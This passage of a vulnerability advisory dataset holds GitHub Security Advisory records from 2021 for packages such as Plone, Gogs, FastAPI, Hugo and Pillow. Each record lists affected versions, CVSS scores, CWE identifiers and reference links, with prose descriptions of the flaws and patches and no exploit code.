'https://lists.apache.org/thread.html/r2dc5588009dc9f0310b7382269f932cc96cae4c3901b747dda1a7fed@%3Cjava-dev.axis.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rbb01d10512098894cd5f22325588197532c64f1c818ea7e4120d40c1@%3Cjava-dev.axis.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/06/msg00024.html'}, {'type': 'WEB', 'url': 'https://poi.apache.org/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210513-0004/'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-776'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T21:33:29Z', 'nvd_published_at': '2021-01-14T15:15:00Z'}" +1.4.0,GHSA-rmpv-rcp6-v8wc,2021-05-27T22:04:38Z,2021-06-08T23:20:11Z,,['CVE-2021-33508'],Cross-site scripting in Plone,Plone through 5.2.4 allows XSS via a full name that is mishandled during rendering of the ownership tab of a content item.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Plone'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '5.2.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-33508'}, {'type': 'WEB', 'url': 'https://plone.org/security/hotfix/20210518/stored-xss-from-user-fullname'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/05/22/1'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-27T22:04:38Z', 'nvd_published_at': '2021-05-21T22:15:00Z'}" +1.4.0,GHSA-mr6h-chqp-p9g2,2023-02-09T20:01:35Z,2021-06-29T18:32:44Z,,['CVE-2014-8681'],SQL Injection in gogs.io/gogs,SQL injection vulnerability in the GetIssues function in models/issue.go in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.6.x before 0.5.6.1025 Beta allows remote attackers to execute arbitrary SQL commands via the label parameter to user/repos/issues.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'Go', 'name': 'gogs.io/gogs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.1'}, {'fixed': '0.5.8'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/gogits/gogs'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.3.1'}, {'fixed': '0.5.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2014-8681'}, {'type': 'WEB', 'url': 'https://github.com/gogits/gogs/commit/83283bca4cb4e0f4ec48a28af680f0d88db3d2c8'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/commit/83283bca4cb4e0f4ec48a28af680f0d88db3d2c8'}, {'type': 'WEB', 'url': 'https://exchange.xforce.ibmcloud.com/vulnerabilities/98695'}, {'type': 'PACKAGE', 'url': 'https://github.com/gogits/gogs'}, {'type': 'WEB', 'url': 'https://github.com/gogits/gogs/releases/tag/v0.5.8'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2020-0021'}, {'type': 'WEB', 'url': 'https://seclists.org/fulldisclosure/2014/Nov/31'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20150711111508/http://gogs.io/docs/intro/change_log.html#v0.5.8-%40-2014-11-19'}, {'type': 'WEB', 'url': 'https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-8681'}, {'type': 'WEB', 'url': 'https://www.exploit-db.com/exploits/35237'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/129116/Gogs-Label-Search-Blind-SQL-Injection.html'}, {'type': 'WEB', 'url': 'http://seclists.org/fulldisclosure/2014/Nov/31'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T21:47:51Z', 'nvd_published_at': None}" +1.4.0,GHSA-8wwf-2644-f8x4,2023-08-07T14:11:00Z,2021-06-15T15:49:01Z,,['CVE-2021-34363'],The Fuck Arbitrary File Deletion via Path Traversal,The thefuck (aka _The Fuck_) is app that corrects errors in previous console commands. _The Fuck_ python package before 3.31 allows Path Traversal that leads to arbitrary file deletion via the `undo archive operation` feature.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'thefuck'}, 'ecosystem_specific': {'affected_functions': ['thefuck.rules.dirty_untar.side_effect', 'thefuck.rules.dirty_unzip.side_effect']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.31'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-34363'}, {'type': 'WEB', 'url': 'https://github.com/nvbn/thefuck/commit/e343c577cd7da4d304b837d4a07ab4df1e023092'}, {'type': 'PACKAGE', 'url': 'https://github.com/nvbn/thefuck'}, {'type': 'WEB', 'url': 'https://github.com/nvbn/thefuck/releases/tag/3.31'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4MEDDLBFVRUQHPYIBJ4MFM3M4NUJUXL5/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YA6UNQSOY6M3NJDZLS6YJXTS4WGDMEEJ/'}, {'type': 'WEB', 'url': 'https://vuln.ryotak.me/advisories/48'}]","{'cwe_ids': ['CWE-22'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:25:06Z', 'nvd_published_at': '2021-06-10T11:15:00Z'}" +1.4.0,GHSA-gq5r-cc4w-g8xf,2023-08-30T18:52:39Z,2021-06-23T17:25:08Z,,[],gosaml2 is vulnerable to NULL Pointer Dereference from malformed XML signatures,This affects all versions less than 0.7.0 of package github.com/russellhaering/gosaml2. There is a crash on null pointer dereference caused by sending malformed XML signatures.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/russellhaering/gosaml2'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.7.0'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/russellhaering/goxmldsig'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7731'}, {'type': 'WEB', 'url': 'https://github.com/russellhaering/gosaml2/issues/59'}, {'type': 'WEB', 'url': 'https://github.com/russellhaering/goxmldsig/issues/48'}, {'type': 'WEB', 'url': 'https://github.com/russellhaering/gosaml2/pull/90'}, {'type': 'WEB', 'url': 'https://github.com/russellhaering/gosaml2/commit/66e3b7affd622b8b24ea1e18845f045e46b23424'}, {'type': 'PACKAGE', 'url': 'https://github.com/russellhaering/gosaml2'}, {'type': 'WEB', 'url': 'https://github.com/russellhaering/gosaml2/releases/tag/v0.7.0'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-GOLANG-GITHUBCOMRUSSELLHAERINGGOSAML2-608302'}]","{'cwe_ids': ['CWE-476'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T21:39:22Z', 'nvd_published_at': '2021-04-30T16:15:00Z'}" +1.4.0,GHSA-8h2j-cgx8-6xv7,2021-06-17T20:06:14Z,2021-06-10T15:43:54Z,,['CVE-2021-32677'],Cross-Site Request Forgery (CSRF) in FastAPI,"### Impact + +FastAPI versions lower than `0.65.2` that used cookies for authentication in path operations that received JSON payloads sent by browsers were vulnerable to a Cross-Site Request Forgery (CSRF) attack. + +In versions lower than `0.65.2`, FastAPI would try to read the request payload as JSON even if the `content-type` header sent was not set to `application/json` or a compatible JSON media type (e.g. `application/geo+json`). + +So, a request with a content type of `text/plain` containing JSON data would be accepted and the JSON data would be extracted. + +But requests with content type `text/plain` are exempt from [CORS](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) preflights, for being considered [Simple requests](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests). So, the browser would execute them right away including cookies, and the text content could be a JSON string that would be parsed and accepted by the FastAPI application. + +### Patches + +This is fixed in FastAPI `0.65.2`. + +The request data is now parsed as JSON only if the `content-type` header is `application/json` or another JSON compatible media type like `application/geo+json`. + +### Workarounds + +It's best to upgrade to the latest FastAPI. + +But still, it would be possible to add a middleware or a dependency that checks the `content-type` header and aborts the request if it is not `application/json` or another JSON compatible content type. + +### References + +* [CORS on Mozilla web docs](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS) +* [This answer on StackExchange](https://security.stackexchange.com/questions/157528/ways-to-bypass-browsers-cors-policy/157531#157531) +* [OWASP CSRF](https://owasp.org/www-community/attacks/csrf) +* Fixed in PR [#2118](https://github.com/tiangolo/fastapi/pull/2118) + +### For more information + +If you have any questions or comments, write to [security@tiangolo.com](mailto:security@tiangolo.com)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'fastapi'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.65.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tiangolo/fastapi/security/advisories/GHSA-8h2j-cgx8-6xv7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32677'}, {'type': 'WEB', 'url': 'https://github.com/tiangolo/fastapi/commit/fa7e3c996edf2d5482fff8f9d890ac2390dede4d'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MATAWX25TYKNEKLDMKWNLYDB34UWTROA/'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-09T13:34:54Z', 'nvd_published_at': '2021-06-09T18:15:00Z'}" +1.4.0,GHSA-rrvg-2c69-p9rf,2022-12-15T18:20:16Z,2021-06-16T17:28:58Z,,['CVE-2021-21652'],CSRF vulnerability in Jenkins Xray - Test Management for Jira Plugin allows capturing credentials,"Xray - Test Management for Jira Plugin 2.4.0 and earlier does not require POST requests for a connection test method, resulting in a cross-site request forgery (CSRF) vulnerability. + +This vulnerability allows attackers to connect to an attacker-specified URL using attacker-specified credentials IDs obtained through another method, capturing credentials stored in Jenkins. + +Xray - Test Management for Jira Plugin 2.4.1 requires POST requests for the affected connection test method.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:xray-connector'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.4.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21652'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/xray-connector-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2021-05-11/#SECURITY-2251%20(1)'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-19T19:12:26Z', 'nvd_published_at': '2021-05-11T15:15:00Z'}" +1.4.0,GHSA-8j34-9876-pvfq,2021-05-21T18:15:45Z,2021-06-23T17:28:26Z,,['CVE-2020-26284'],Hugo can execute a binary from the current directory on Windows,"## Impact + +Hugo depends on Go's `os/exec` for certain features, e.g. for rendering of Pandoc documents if these binaries are found in the system `%PATH%` on Windows. However, if a malicious file with the same name (`exe` or `bat`) is found in the current working directory at the time of running `hugo`, the malicious command will be invoked instead of the system one. + +Windows users who run `hugo` inside untrusted Hugo sites are affected. + +## Patches +Users should upgrade to Hugo v0.79.1.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/gohugoio/hugo'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.79.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gohugoio/hugo/security/advisories/GHSA-8j34-9876-pvfq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-26284'}, {'type': 'WEB', 'url': 'https://github.com/golang/go/issues/38736'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T18:15:45Z', 'nvd_published_at': '2020-12-21T23:15:00Z'}" +1.4.0,GHSA-jv35-xqg7-f92r,2023-09-13T20:02:47Z,2021-06-21T17:16:09Z,,['CVE-2021-25949'],set-getter Prototype Pollution Vulnerability,Prototype pollution vulnerability in ‘set-getter’ version 0.1.0 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'set-getter'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25949'}, {'type': 'WEB', 'url': 'https://github.com/doowb/set-getter/commit/66eb3f0d4686a4a8c7c3d6f7ecd8e570b580edc4'}, {'type': 'PACKAGE', 'url': 'https://github.com/doowb/set-getter'}, {'type': 'WEB', 'url': 'https://github.com/doowb/set-getter/blob/5bc2750fe1c3db9651d936131be187744111378d/index.js#L56'}, {'type': 'WEB', 'url': 'https://web.archive.org/web/20210615022308/https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25949'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-14T19:22:58Z', 'nvd_published_at': '2021-06-10T12:15:00Z'}" +1.4.0,GHSA-w942-gw6m-p62c,2023-08-30T11:40:58Z,2021-06-23T17:53:05Z,,['CVE-2020-35380'],Denial of service in GJSON,"GJSON before 1.6.4 allows attackers to cause a denial of service via crafted JSON. Due to improper bounds checking, maliciously crafted JSON objects can cause an out-of-bounds panic. If parsing user input, this may be used as a denial of service vector.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/tidwall/gjson'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35380'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/issues/192'}, {'type': 'WEB', 'url': 'https://github.com/tidwall/gjson/commit/f0ee9ebde4b619767ae4ac03e8e42addb530f6bc'}, {'type': 'PACKAGE', 'url': 'https://github.com/tidwall/gjson'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2021-0059'}]","{'cwe_ids': ['CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-12T21:50:06Z', 'nvd_published_at': None}" +1.4.0,GHSA-52qp-gwwh-qrg4,2021-06-16T20:15:07Z,2021-06-21T17:10:02Z,,['CVE-2021-32684'],Missing Handler in @scandipwa/magento-scripts,"### Impact +After changing the function from synchronous to asynchronous there wasn't implemented handler in the [start](https://docs.create-magento-app.com/getting-started/available-commands/start), [stop](https://docs.create-magento-app.com/getting-started/available-commands/stop), [exec](https://docs.create-magento-app.com/getting-started/available-commands/exec) and [logs](https://docs.create-magento-app.com/getting-started/available-commands/logs) commands, effectively making them unusable. + +### Patches +[Version 1.5.3](https://github.com/scandipwa/create-magento-app/releases/tag/%40scandipwa%2Fmagento-scripts%401.5.3) contains patches for the problems described above. + +### Workarounds +Upgrade to patched or latest (recommended) version `npm i @scandipwa/magento-scripts@1.5.3` or `npm i @scandipwa/magento-scripts@latest`. + +### References +New releases always available here: https://github.com/scandipwa/create-magento-app/releases + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [create-magento-app](https://github.com/scandipwa/create-magento-app/issues) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@scandipwa/magento-scripts'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.1'}, {'fixed': '1.5.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/scandipwa/create-magento-app/security/advisories/GHSA-52qp-gwwh-qrg4'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32684'}, {'type': 'WEB', 'url': 'https://github.com/scandipwa/create-magento-app/commit/89115db7031e181eb8fb4ec2822bc6cab88e7071'}]","{'cwe_ids': ['CWE-670'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-16T20:15:07Z', 'nvd_published_at': '2021-06-14T23:15:00Z'}" +1.4.0,GHSA-m7rg-8wvq-846v,2023-08-08T19:57:34Z,2021-06-07T21:49:14Z,,['CVE-2021-25947'],Prototype pollution in nestie,Prototype pollution vulnerability in 'nestie' versions 0.0.0 through 1.0.0 allows an attacker to cause a denial of service and may lead to remote code execution.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'nestie'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-25947'}, {'type': 'WEB', 'url': 'https://github.com/lukeed/nestie/commit/bc80d5898d1e5e8a3d325d355eda0c325c8dcfc2'}, {'type': 'WEB', 'url': 'https://www.whitesourcesoftware.com/vulnerability-database/CVE-2021-25947'}]","{'cwe_ids': ['CWE-1321', 'CWE-913'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-06-04T18:32:41Z', 'nvd_published_at': '2021-06-03T20:15:00Z'}" +1.4.0,GHSA-433w-mm6h-rv9p,2021-05-21T20:47:30Z,2021-06-23T17:29:06Z,,[],Auth bypass in SAML provider,"### Impact + +The following vulnerabilities have been disclosed, which impact users leveraging the SAML auth provider: + +- [`goxmldsig` - Signature Validation Bypass](https://github.com/russellhaering/goxmldsig/security/advisories/GHSA-q547-gmf8-8jr7) +- [`gosaml2` - Authentication Bypass](https://github.com/russellhaering/gosaml2/security/advisories/GHSA-xhqq-x44f-9fgg) + +### Patches + +[Patch available](https://github.com/netlify/gotrue/pull/274) + +Please upgrade to v1.0.0 or commit hash `a2b4dd6bc4ef7562d1df044098b303f564eefa90` + +### Workarounds + +No known workarounds. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [gotrue](https://github.com/netlify/gotrue/issues) +* Email us at [security@netlify.com](mailto:security@netlify.com)",[],"[{'package': {'ecosystem': 'Go', 'name': 'github.com/netlify/gotrue'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/netlify/gotrue/security/advisories/GHSA-433w-mm6h-rv9p'}]","{'cwe_ids': [], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-21T20:47:30Z', 'nvd_published_at': None}" +1.4.0,GHSA-257v-vj4p-3w2h,2021-06-30T18:03:29Z,2021-06-22T01:14:09Z,,['CVE-2021-29060'],Regular Expression Denial of Service (ReDOS),"In the npm package `color-string`, there is a ReDos (Regular Expression Denial of Service) vulnerability regarding an exponential time complexity for +linearly increasing input lengths for `hwb()` color strings. + +Strings reaching more than 5000 characters would see several +milliseconds of processing time; strings reaching more than +50,000 characters began seeing 1500ms (1.5s) of processing time. + +The cause was due to a the regular expression that parses +hwb() strings - specifically, the hue value - where +the integer portion of the hue value used a 0-or-more quantifier +shortly thereafter followed by a 1-or-more quantifier. + +This caused excessive backtracking and a cartesian scan, +resulting in exponential time complexity given a linear +increase in input length.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'color-string'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.5.5'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29060'}, {'type': 'WEB', 'url': 'https://github.com/Qix-/color-string/commit/0789e21284c33d89ebc4ab4ca6f759b9375ac9d3'}, {'type': 'WEB', 'url': 'https://github.com/Qix-/color-string/releases/tag/1.5.5'}, {'type': 'WEB', 'url': 'https://github.com/yetingli/PoCs/blob/main/CVE-2021-29060/Color-String.md'}, {'type': 'WEB', 'url': 'https://github.com/yetingli/SaveResults/blob/main/js/color-string.js'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/color-string'}]","{'cwe_ids': ['CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-21T23:20:37Z', 'nvd_published_at': '2021-06-21T16:15:00Z'}" +1.4.0,GHSA-4w4p-xwrr-9crh,2021-05-25T20:57:05Z,2021-06-16T17:18:49Z,,['CVE-2020-1961'],Injection in Apache Syncope,"Vulnerability to Server-Side Template Injection on Mail templates for Apache Syncope 2.0.X releases prior to 2.0.15, 2.1.X releases prior to 2.1.6, enabling attackers to inject arbitrary JEXL expressions, leading to Remote Code Execution (RCE) was discovered.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.syncope:syncope-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '2.0.15'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.syncope:syncope-core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.1.0'}, {'fixed': '2.1.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-1961'}, {'type': 'WEB', 'url': 'http://syncope.apache.org/security'}]","{'cwe_ids': ['CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-25T20:57:05Z', 'nvd_published_at': '2020-05-04T13:15:00Z'}" +1.4.0,GHSA-c738-77x8-wmq5,2022-02-08T21:27:27Z,2021-06-08T22:29:29Z,,['CVE-2020-14340'],Uncontrolled Resource Consumption in XNIO,A vulnerability was discovered in XNIO where file descriptor leak caused by growing amounts of NIO Selector file handles between garbage collection cycles. It may allow the attacker to cause a denial of service. It affects XNIO versions 3.6.0.Beta1 through 3.8.1.Final.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jboss.xnio:xnio-nio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.8.0.Final'}, {'fixed': '3.8.2.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.8.1.Final'}}, {'package': {'ecosystem': 'Maven', 'name': 'org.jboss.xnio:xnio-nio'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.6.0'}, {'fixed': '3.7.9.Final'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.7.8.Final'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-14340'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=1860218'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T20:32:00Z', 'nvd_published_at': '2021-06-02T13:15:00Z'}" +1.4.0,GHSA-jj6m-r8jc-2gp7,2022-10-25T20:24:52Z,2021-06-23T18:03:18Z,,['CVE-2021-32699'],Asymmetric Resource Consumption (Amplification) in Docker containers created by Wings ,"### Impact +All versions of Pterodactyl Wings preior to `1.4.4` are vulnerable to system resource exhaustion due to improper container process limits being defined. A malicious user can consume more resources than intended and cause downstream impacts to other clients on the same hardware, eventually causing the physical server to stop responding. + +### Patches +Users should upgrade to `1.4.4`. + +### Workarounds +There is no non-code based workaround for impacted versions of the software. Users running customized versions of this software can manually set a PID limit for containers created. + +### For more information +If you have any questions or comments about this advisory: +* Contact us on [Discord](https://discord.gg/pterodactyl) +* Email us at `dane ät pterodactyl dot io`","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/pterodactyl/wings'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/security/advisories/GHSA-jj6m-r8jc-2gp7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32699'}, {'type': 'WEB', 'url': 'https://github.com/pterodactyl/wings/commit/e0078eee0a71d61573a94c75e6efcad069d78de3'}, {'type': 'PACKAGE', 'url': 'https://github.com/pterodactyl/wings'}]","{'cwe_ids': ['CWE-405', 'CWE-770'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-06-22T15:43:57Z', 'nvd_published_at': '2021-06-22T20:15:00Z'}" +1.4.0,GHSA-7r7m-5h27-29hp,2021-09-15T18:25:52Z,2021-06-08T18:48:53Z,,['CVE-2021-28676'],Potential infinite loop in Pillow,"An issue was discovered in Pillow before 8.2.0. For FLI data, FliDecode did not properly check that the block advance was non-zero, potentially leading to an infinite loop on load.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Pillow'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28676'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/pull/5377'}, {'type': 'WEB', 'url': 'https://github.com/python-pillow/Pillow/commit/bb6c11fb889e6c11b0ee122b828132ee763b5856'}, {'type': 'PACKAGE', 'url': 'https://github.com/python-pillow/Pillow'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/07/msg00018.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQHA5HAIBOYI3R6HDWCLAGFTIQP767FL/'}, {'type': 'WEB', 'url': 'https://pillow.readthedocs.io/en/stable/releasenotes/8.2.0.html#cve-2021-28676-fix-fli-dos'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202107-33'}]","{'cwe_ids': ['CWE-835'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-06-03T21:46:13Z', 'nvd_published_at': '2021-06-02T16:15:00Z'}" +1.4.0,GHSA-pgf8-28gg-vpr6,2021-06-07T18:55:30Z,2021-06-04T19:09:20Z,,['CVE-2021-32662'],Path traversal,"### Impact + +A malicious actor could read sensitive files from the environment where TechDocs documentation is built and published by setting a particular path for `docs_dir` in `mkdocs.yml`. These files would then be available over the TechDocs backend API. + +This vulnerability is mitigated by the fact that an attacker would need access to modify the `mkdocs.yml` in the documentation source code, and would also need access to the TechDocs backend API. + +### Patches + +The vulnerability is patched in the `0.6.3` release of `@backstage/techdocs-common`. + +### For more information + +If you have any questions or comments about this advisory: + +* Open an issue in the [Backstage repository](https://github.com/backstage/backstage) +* Visit our chat, linked to in [Backstage README](https://github.com/backstage/backstage)","[{'type': 'CVSS_V3', 'score': 